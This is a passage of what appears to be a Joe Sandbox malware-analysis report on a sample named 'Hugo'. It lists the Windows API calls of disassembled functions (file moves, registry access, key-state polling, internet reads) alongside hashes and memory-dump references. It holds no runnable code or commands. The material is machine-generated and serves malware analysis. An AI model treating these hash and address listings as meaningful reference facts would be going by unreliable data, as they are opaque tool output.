                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 826366716-0
                                                                                                                                                                                                              • Opcode ID: 980d9de031be8ac92b7b9497940f36f78cc87d905d8e40eb442d5827406a4583
                                                                                                                                                                                                              • Instruction ID: 44bd313053e52d1b11dc2bcef53804162e9b89cf57721b9fe1897f6d874cebf9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 980d9de031be8ac92b7b9497940f36f78cc87d905d8e40eb442d5827406a4583
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC61B371608241EFD714DF14C890E6ABBE5FF84318F54859CF09A8B292CB35ED46DB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F7E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F7D7CD,?), ref: 00F7E714
                                                                                                                                                                                                                • Part of subcall function 00F7E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F7D7CD,?), ref: 00F7E72D
                                                                                                                                                                                                                • Part of subcall function 00F7EAB0: GetFileAttributesW.KERNEL32(?,00F7D840), ref: 00F7EAB1
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00F7ED8A
                                                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00F7EDC3
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F7EF02
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F7EF1A
                                                                                                                                                                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00F7EF67
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3183298772-0
                                                                                                                                                                                                              • Opcode ID: e38fd4a74ae04fb3019544258d84520d1e4853555f69e6374de0bbd9d2126be6
                                                                                                                                                                                                              • Instruction ID: fc746d43e575643d16cc776f85bc4cd9cbbdb77fd079a33f7bab1a5e2dfe7721
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e38fd4a74ae04fb3019544258d84520d1e4853555f69e6374de0bbd9d2126be6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 685160B24083859BC724DBA4DC919DBB3ECAF89350F40492FF28983151EF74A6889766
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00F79534
                                                                                                                                                                                                              • VariantClear.OLEAUT32 ref: 00F795A5
                                                                                                                                                                                                              • VariantClear.OLEAUT32 ref: 00F79604
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00F79677
                                                                                                                                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F796A2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4136290138-0
                                                                                                                                                                                                              • Opcode ID: 69c0e725d6beafdc34b90873243c7a808b50455def016cd0049c0d9b20957ec3
                                                                                                                                                                                                              • Instruction ID: 7a45827c1acad63480a5079e9a6d64b289b243a51d75652a8feecb3167602fc2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69c0e725d6beafdc34b90873243c7a808b50455def016cd0049c0d9b20957ec3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A95149B5A04219EFCB14CF58C884AAAB7F9FF8D314B15855AE90ADB310E770E911CF90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F895F3
                                                                                                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00F8961F
                                                                                                                                                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F89677
                                                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F8969C
                                                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F896A4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2832842796-0
                                                                                                                                                                                                              • Opcode ID: 07f56daacb93ecb705c1965775b1135a2711d68791689a0c96447953d8392a82
                                                                                                                                                                                                              • Instruction ID: c3406de3e7a4ceade33d5907d075e39880903269dfe357de68a5896aa80c3950
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07f56daacb93ecb705c1965775b1135a2711d68791689a0c96447953d8392a82
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54513D75A002199FCB05EF55C881AAEBBF5FF49314F088058E849AB362DB75ED41DB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00F9999D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00F99A2D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F99A49
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00F99A8F
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00F99AAF
                                                                                                                                                                                                                • Part of subcall function 00F2F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00F81A02,?,7644E610), ref: 00F2F9F1
                                                                                                                                                                                                                • Part of subcall function 00F2F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00F70354,00000000,00000000,?,?,00F81A02,?,7644E610,?,00F70354), ref: 00F2FA18
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 666041331-0
                                                                                                                                                                                                              • Opcode ID: 015a42bbc86f2c752912030065689037c7d366e5d4223ff2c3359f379b2eb90b
                                                                                                                                                                                                              • Instruction ID: b24c1e9aa54dfb12e344213df67624a25810e2636b4a5ad6dbd0153aa5b7fb9a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 015a42bbc86f2c752912030065689037c7d366e5d4223ff2c3359f379b2eb90b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA518D35A04205DFDB05DF68C4819ADBBF0FF09324B0580A8E80A9B722D775ED86DF81
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00FA766B
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,?), ref: 00FA7682
                                                                                                                                                                                                              • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00FA76AB
                                                                                                                                                                                                              • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00F8B5BE,00000000,00000000), ref: 00FA76D0
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00FA76FF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3688381893-0
                                                                                                                                                                                                              • Opcode ID: 4209200db7d4c2f2f27cd2443cd7659cdf3d14a268e37d140929af415541eccc
                                                                                                                                                                                                              • Instruction ID: 99a83f84141b2f06fcc66ea63d03245abc8bd48052b38d6cc648fd9dc2f6221b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4209200db7d4c2f2f27cd2443cd7659cdf3d14a268e37d140929af415541eccc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2141D3B5E08608AFD729AF2CCC48FAA7B65EB47360F150224F815A73E1D770AD41FA50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                              • Opcode ID: a0997095f6ec26161a23720d5e928baaeab57a16f7e47adf47fe6371d47fbc2b
                                                                                                                                                                                                              • Instruction ID: c5e45ec0841997d9782ed550bf35395b48d3dc7f8a5c5ad82641722176d98644
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0997095f6ec26161a23720d5e928baaeab57a16f7e47adf47fe6371d47fbc2b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D041B232E002049BCB20DF78C881A5DBBF6EF88324F554569E915EB396DA35AD01EB81
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00F119E1
                                                                                                                                                                                                              • ScreenToClient.USER32(00000000,?), ref: 00F119FE
                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000001), ref: 00F11A23
                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000002), ref: 00F11A3D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4210589936-0
                                                                                                                                                                                                              • Opcode ID: eb1336bf1f6f6e09f9e2e271be3f6e975e254ddb00932e6a6f6e74f702051e06
                                                                                                                                                                                                              • Instruction ID: 2858df987327a6a6376e5c32709509ab502017d8a975c0d0f7e62da6a03efcdd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb1336bf1f6f6e09f9e2e271be3f6e975e254ddb00932e6a6f6e74f702051e06
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA418471E0450AFFDF059F68C854BEDBB74FF05375F20421AE929A2290C7346A94EB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetInputState.USER32 ref: 00F84310
                                                                                                                                                                                                              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00F84367
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00F84390
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00F8439A
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F843AB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2256411358-0
                                                                                                                                                                                                              • Opcode ID: 6aea4f405d557713ef5317f50760b5a20333f8c68b6408fc5b865949f59b9741
                                                                                                                                                                                                              • Instruction ID: a51b0fdf82eb73f20637d6ca29f7661611abe5bac3d7bbd46ec2e2a47d1aa807
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6aea4f405d557713ef5317f50760b5a20333f8c68b6408fc5b865949f59b9741
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4831A470D0438BDEEB78EB74D889BF63BACAB01314F044569D462861A1F7A4B845FF21
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00F72262
                                                                                                                                                                                                              • PostMessageW.USER32(00000001,00000201,00000001), ref: 00F7230E
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 00F72316
                                                                                                                                                                                                              • PostMessageW.USER32(00000001,00000202,00000000), ref: 00F72327
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00F7232F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3382505437-0
                                                                                                                                                                                                              • Opcode ID: 47e45fdccd18ec1258b19c04d06a85551fcdd59fd65e50f7ac5081339a65d30e
                                                                                                                                                                                                              • Instruction ID: 4c377c376d00bfe1e580c1954bf3979ade78a9a0bf8b2b7e6bbd79f7ce6d2dca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47e45fdccd18ec1258b19c04d06a85551fcdd59fd65e50f7ac5081339a65d30e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3731A471900219EFDB14CFA8CD89ADE3BB5EB05325F10822AF926A72D1C770D954EB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00F8CC63,00000000), ref: 00F8D97D
                                                                                                                                                                                                              • InternetReadFile.WININET(?,00000000,?,?), ref: 00F8D9B4
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,?,00F8CC63,00000000), ref: 00F8D9F9
                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,00F8CC63,00000000), ref: 00F8DA0D
                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,00F8CC63,00000000), ref: 00F8DA37
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3191363074-0
                                                                                                                                                                                                              • Opcode ID: 64fdcfd816768d404b2d17f4446cf0725c2356bf4182b7feafc4f76e14f1625d
                                                                                                                                                                                                              • Instruction ID: 2e21c76abacf033e79fc3f1bc9287f3eba70810f048c82020836e84d20701876
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64fdcfd816768d404b2d17f4446cf0725c2356bf4182b7feafc4f76e14f1625d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D315E71904205EFDB24EFA5D885AAFB7F8EF05364B20442EE546D2191DB34EE41EB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00FA61E4
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00FA623C
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA624E
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA6259
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FA62B5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$_wcslen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 763830540-0
                                                                                                                                                                                                              • Opcode ID: 3a8243f1302c6cf528bb21bc708c3c4b98828f7d940dd5ed3a701072a0b4be9b
                                                                                                                                                                                                              • Instruction ID: b5198d0ba3596d281cc23d212de70cafa247c2ec0086f2975b9b4d6c71b3836c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a8243f1302c6cf528bb21bc708c3c4b98828f7d940dd5ed3a701072a0b4be9b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F2182B1D002189ADF209FA4CC84AEE7BB8EF06734F144216F925EA180E7709985EF50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 00F913AE
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00F913C5
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00F91401
                                                                                                                                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 00F9140D
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 00F91445
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4156661090-0
                                                                                                                                                                                                              • Opcode ID: f65c1ef9ebe7f4de9041b6096f5f8e91bd4a128723bac9f43cabc9bdfde0dd2b
                                                                                                                                                                                                              • Instruction ID: 13ddf3e94eabfcf67d2117e7df93d23339bb50ff4c3e3756e8ef306a1438dd2a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f65c1ef9ebe7f4de9041b6096f5f8e91bd4a128723bac9f43cabc9bdfde0dd2b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B215E76600218AFDB04EF65CC84EAEBBF5EF49340B048479E85A97751DB34AD44EB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00F4D146
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F4D169
                                                                                                                                                                                                                • Part of subcall function 00F43B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F36A79,?,0000015D,?,?,?,?,00F385B0,000000FF,00000000,?,?), ref: 00F43BC5
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F4D18F
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4D1A2
                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F4D1B1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
